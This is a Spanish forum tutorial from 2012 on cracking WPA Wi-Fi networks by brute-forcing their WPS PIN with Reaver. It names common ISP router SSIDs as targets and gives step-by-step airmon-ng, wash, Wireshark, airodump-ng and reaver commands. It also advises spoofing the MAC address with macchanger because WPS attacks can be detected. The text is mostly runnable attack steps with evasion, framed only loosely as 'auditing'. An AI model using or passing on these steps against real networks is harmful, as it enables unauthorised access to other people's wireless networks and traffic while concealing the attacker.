TUTORIAL Reaver (WPA) (Wifiway 3.

4)
por chiki el Sb Ene 21, 2012 3:02 pm

Contribuciones por
Warcry
zape000
gorilla.maguila
Primer paso
Para evitar perder el tiempo es indispensable
determinar si la red a auditar tiene activado WPS, y que
sea una de estas:
WLAN_xxxx
FTE-xxxx
Ooxxxx
Vodafonexxxx (MAC empieza por 62:C7...)
*******************
Antiguamente se poda hacer con Walsh pero este ya no
es el caso. De todas formas indicamos las instrucciones
por si alguien les puede sacar provecho
1) Desde la consola poner la tarjeta de red en modo
monitor
#airmon-ng start wlan0
2) Ejecutar walsh
# walsh -i mon0 -C
*******************
En vista de que Walsh ya no funciona el forista
gorilla.maguila propuso el siguiente metodo efectivo

1) Desde la consola poner la tarjeta de red en modo

monitor
# airmon-ng start wlan0
2) Abrimos el wireshark.
-> Menu Capture
->Options
Elegimos interfaz mon0 (o la que nos haya dado el
airmon).
3) Nos aseguramos que no est seleccionada la opcin:
"Capture packets in promiscuous mode"
4) Le damos a Start para comenzar la captura de
paquetes.
5) Para ver si tiene el WPS activado miramos en los
paquetes broadcast la informacin que se encuentra en:
->IEEE 802.11 wireless LAN management frame
->Tagged parameters:
-> Tag: Vendor Specific: Microsoft WPS

*******************
Si la red tiene WPS se puede proceder a utilizar Reaver
1) Dado que los ataques WPS son detectables,

indispensable cambiar la MAC, no es necesario si no

se quiere.
# macchanger -m 00:11:22:33:44:55 mon0
2) Buscar el AP deseado y anotar su BSSID
correspondiente
# airodump-ng mon0
3) Se ejecuta Reaver de esta manera
# reaver -i mon0 -b 00:11:22:33:44:56
Para ver detalles sobre el proceso aadir el switch -vv
(Esta preferible esta para ver ms detalles)
# reaver -i mon0 -b 00:11:22:33:44:56 -vv
Para cambiar el intervalo entre pins se usa el switch -d
segundos. 0 Corresponde a desactivado.
# reaver -i mon0 -b 00:11:22:33:44:56 -vv -d 1
*******************
Cabe anotar que aunque el Router tenga el boton fisico
de WPS instalado, el modo no necesariamente esta
habilitado internamente. Segun el manual Reaver no
funciona con todos los Routers, y algunos pueden
simplemente bloquearse ante el ataque.
S os surgen problemas, no dudeis en exponerlas aqu.
Se intentaran resolver en la medida de lo posible.